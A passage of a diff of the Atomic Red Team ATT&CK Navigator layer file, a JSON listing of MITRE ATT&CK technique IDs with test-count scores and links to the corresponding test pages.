Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View 
